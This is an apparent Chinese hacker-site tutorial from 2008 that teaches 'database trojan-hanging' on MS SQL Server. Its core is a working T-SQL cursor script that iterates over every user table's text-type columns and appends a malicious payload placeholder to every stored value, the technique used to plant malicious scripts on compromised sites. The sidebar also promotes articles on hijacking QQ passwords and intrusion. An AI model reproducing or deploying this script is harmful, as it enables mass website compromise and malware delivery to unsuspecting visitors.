网络天下|黑客安全|-黑客中国|免费BLOG|黑客安全|安全检测|视频教学|最新音乐|免费游戏|免费软件|安全技术|技术探讨|安全教程

所属分类: 网络收集 更新日期:2008-4-29 17:55:23 阅读次数:154

教你数据库挂马



以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。

SQL语句如下:

用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)


xtype=99 ntext

xtype=35 text

xtype=231 nvarchar

xtype=167 varchar

———————YD的分割——————————–

DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update [’+@T+’] set [’+@C+’]=
rtrim(convert(varchar,[’+@C+’]))+
”挂马内容”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

———————YD的分割——————————–






文章分类

网络收集
支持原创
系统后门

本类热门文章

  google入侵语法整理(253478)
免费Q币,取得相对比较容易(50441)
随便修改别人的QQ号密码(42289)
网上十大黑客软件大曝光(33576)
成为顶级黑客(2003年...(32528)
免费拨打长途固定电话(25246)
QQ密码忘了?打造自己的...(22813)
最详细的黑客教程--第一部(22485)
黑客之八种超级武器(上)(18198)
如何让自己成为一名黑客高...(16508)
网吧常见漏洞及利用(16496)
经典攻击入侵手段(16475)
一分钟入侵WIN9X(14363)
唯一的免费ASP空间(11296)
WEB入侵的过程(9036)

文章搜索



本 站 声 明

  本站的大部分资料,文章都来自网上收集,其版权归作者本人所有,如果有任何侵犯您权益的地方,请联系我,我将马上进行整理,谢谢。

网络天下 版权所有
豫ICP备05013117号 41653354-8
Email: webmaster@lzbiz.com QQ:7787686 TEL:13783172430